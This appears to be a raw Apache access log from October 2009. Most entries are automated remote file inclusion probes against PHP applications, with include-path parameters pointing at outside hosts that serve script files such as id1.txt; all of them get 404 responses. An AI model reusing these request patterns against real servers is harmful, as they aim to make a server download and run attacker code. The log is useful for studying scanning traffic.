211.206.120.162 - - [17/Oct/2009:01:21:00 -0400] "GET /logs//mail.inc.php?skin_board_path=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:01:21:17 -0400] "GET /logs/access_log.Q109092000//mail.inc.php?skin_board_path=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
70.38.54.146 - - [17/Oct/2009:01:21:38 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.eggsactrace.com/mambo/safe.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
207.44.250.68 - - [17/Oct/2009:01:22:04 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://www.standrewkimchicago.org//samok/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
123.125.66.59 - - [17/Oct/2009:01:22:24 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
207.44.250.68 - - [17/Oct/2009:01:22:28 -0400] "GET /logs/access_log.Q109072200///vwar/backup/errors.php?error=http://www.standrewkimchicago.org//samok/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
98.247.163.230 - - [17/Oct/2009:01:22:43 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko)"
211.206.120.162 - - [17/Oct/2009:01:22:47 -0400] "GET /logs/access_log.Q109072200//mail.inc.php?skin_board_path=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:01:22:47 -0400] "GET /logs//mail.inc.php?skin_board_path=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:01:22:48 -0400] "GET //mail.inc.php?skin_board_path=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:01:22:48 -0400] "GET /logs/access_log.Q109092500//mail.inc.php?skin_board_path=http://axcent-eshop.com/shop//images/id1.gif?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
207.44.250.68 - - [17/Oct/2009:01:23:16 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://www.standrewkimchicago.org//samok/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:23:37 -0400] "GET ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:23:37 -0400] "GET /logs///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:23:37 -0400] "GET /logs/access_log.Q109062900///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:23:38 -0400] "GET /logs/error_log.Q109082100///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.44.250.68 - - [17/Oct/2009:01:23:43 -0400] "GET /logs/access_log.Q109072200///vwar/backup/errors.php?error=http://www.standrewkimchicago.org//samok/id1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:01:24:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.169.4.207 - - [17/Oct/2009:01:24:39 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://tw.mc520.mail.yahoo.com/mc/welcome?.gx=1&.tm=1255757172&.rand=brc4fe4igla9n" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
65.98.17.54 - - [17/Oct/2009:01:24:45 -0400] "GET ///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:24:45 -0400] "GET /logs///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:24:45 -0400] "GET /logs/access_log.Q109062900///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
65.98.17.54 - - [17/Oct/2009:01:24:45 -0400] "GET /logs/error_log.Q109082100///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:26:04 -0400] "GET //skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:26:04 -0400] "GET /logs/access_log.Q109092400%20%20//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:26:04 -0400] "GET /logs/access_log.Q109092500%20%20//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:26:04 -0400] "GET /logs//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:26:05 -0400] "GET /logs//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:26:05 -0400] "GET //skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:26:05 -0400] "GET /logs/access_log.Q109092500%20%20//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:26:05 -0400] "GET /logs/access_log.Q109092400%20%20//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:26:05 -0400] "GET /logs//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:26:05 -0400] "GET /logs/access_log.Q109092500//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:26:05 -0400] "GET /logs/access_log.Q109092400//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:26:05 -0400] "GET //skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:26:06 -0400] "GET //skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:26:06 -0400] "GET /logs//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:26:06 -0400] "GET /logs/access_log.Q109092500//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:26:06 -0400] "GET /logs/access_log.Q109092400//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:26:06 -0400] "GET /logs//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:26:06 -0400] "GET /logs/access_log.Q109092400%20%20//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:26:06 -0400] "GET /logs/access_log.Q109092500%20%20//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:26:07 -0400] "GET //skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:26:07 -0400] "GET //skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:26:07 -0400] "GET /logs//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:26:07 -0400] "GET /logs/access_log.Q109092400//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:26:07 -0400] "GET /logs/access_log.Q109092500//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:26:29 -0400] "GET //skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:26:29 -0400] "GET /logs//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:26:29 -0400] "GET /logs/access_log.Q109092500//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:01:26:29 -0400] "GET /logs/access_log.Q109092400//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:26:41 -0400] "GET //skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:26:41 -0400] "GET /logs/access_log.Q109092500//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:26:41 -0400] "GET /logs/access_log.Q109092400//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:01:26:41 -0400] "GET /logs//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:27:06 -0400] "GET //skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:27:06 -0400] "GET /logs/access_log.Q109092500//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:27:06 -0400] "GET /logs//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:01:27:06 -0400] "GET /logs/access_log.Q109092400//skin/uks_gallery_v3020/setup.php?dir=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:27:58 -0400] "GET ///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:27:58 -0400] "GET /logs///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:27:58 -0400] "GET /logs/access_log.Q109051400%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:28:17 -0400] "GET /logs/error_log.Q109052500%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:28:17 -0400] "GET /logs/error_log.Q109100300%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
69.65.65.67 - - [17/Oct/2009:01:28:17 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
69.65.65.67 - - [17/Oct/2009:01:28:18 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.65.65.67 - - [17/Oct/2009:01:28:18 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:28:24 -0400] "GET /logs/error_log.Q109051400%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:28:24 -0400] "GET /logs/error_log.Q109072300%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:28:24 -0400] "GET /logs/access_log.Q109072300%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:28:24 -0400] "GET /logs/access_log.Q109052500%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
69.65.65.67 - - [17/Oct/2009:01:28:25 -0400] "GET /logs/access_log.Q109090100/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:28:35 -0400] "GET /logs/access_log.Q109051800%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:28:35 -0400] "GET /logs/error_log.Q109051800%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:28:35 -0400] "GET /logs/access_log.Q109090700%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:28:35 -0400] "GET /logs/error_log.Q109090700%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:28:39 -0400] "GET /logs/error_log.Q109080500%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:28:43 -0400] "GET ///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:28:43 -0400] "GET /logs///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:28:43 -0400] "GET /logs/access_log.Q109051400%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:28:43 -0400] "GET /logs/error_log.Q109052500%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:28:46 -0400] "GET /logs/error_log.Q109070100%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:28:46 -0400] "GET /logs/error_log.Q109091000%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:28:46 -0400] "GET /logs/access_log.Q109091000%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:28:46 -0400] "GET /logs/access_log.Q109080500%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:28:46 -0400] "GET /logs/access_log.Q109070100%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:29:04 -0400] "GET /logs/error_log.Q109100300%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:29:04 -0400] "GET /logs/error_log.Q109072300%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:29:04 -0400] "GET /logs/error_log.Q109051400%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:29:04 -0400] "GET /logs/access_log.Q109052500%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:29:04 -0400] "GET /logs/access_log.Q109072300%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:29:15 -0400] "GET /logs/access_log.Q109051800%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:29:15 -0400] "GET /logs/error_log.Q109051800%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:29:22 -0400] "GET /logs/error_log.Q109090700%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:29:22 -0400] "GET /logs/access_log.Q109090700%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:29:29 -0400] "GET /logs/error_log.Q109080500%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:01:29:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.27.9.117 - - [17/Oct/2009:01:29:35 -0400] "GET /logs/error_log.Q109070100%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:29:35 -0400] "GET /logs/access_log.Q109080500%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:29:35 -0400] "GET /logs/error_log.Q109091000%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:29:35 -0400] "GET /logs/access_log.Q109091000%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
64.27.9.117 - - [17/Oct/2009:01:29:35 -0400] "GET /logs/access_log.Q109070100%20%20///administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.yoontae.com/bbs//zfxid1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
69.64.75.54 - - [17/Oct/2009:01:30:38 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.64.75.54 - - [17/Oct/2009:01:30:38 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.64.75.54 - - [17/Oct/2009:01:30:40 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
69.64.75.54 - - [17/Oct/2009:01:30:44 -0400] "GET /logs/access_log.Q109090100/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
72.30.78.230 - - [17/Oct/2009:01:31:45 -0400] "GET /logs/error_log.Q109092100 HTTP/1.0" 200 1720169 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.65.65.67 - - [17/Oct/2009:01:31:58 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
69.65.65.67 - - [17/Oct/2009:01:32:04 -0400] "GET /logs/access_log.Q109090100%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fresnodelapolvorosa.com/usuarios/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
189.235.112.170 - - [17/Oct/2009:01:32:51 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko)"
206.225.23.4 - - [17/Oct/2009:01:34:10 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:01:34:10 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:01:34:10 -0400] "GET /logs/access_log.Q109062300%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:01:34:22 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:01:34:22 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:01:34:22 -0400] "GET /logs/access_log.Q109062300%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:01:34:31 -0400] "GET /logs/error_log.Q109072700%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:01:34:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
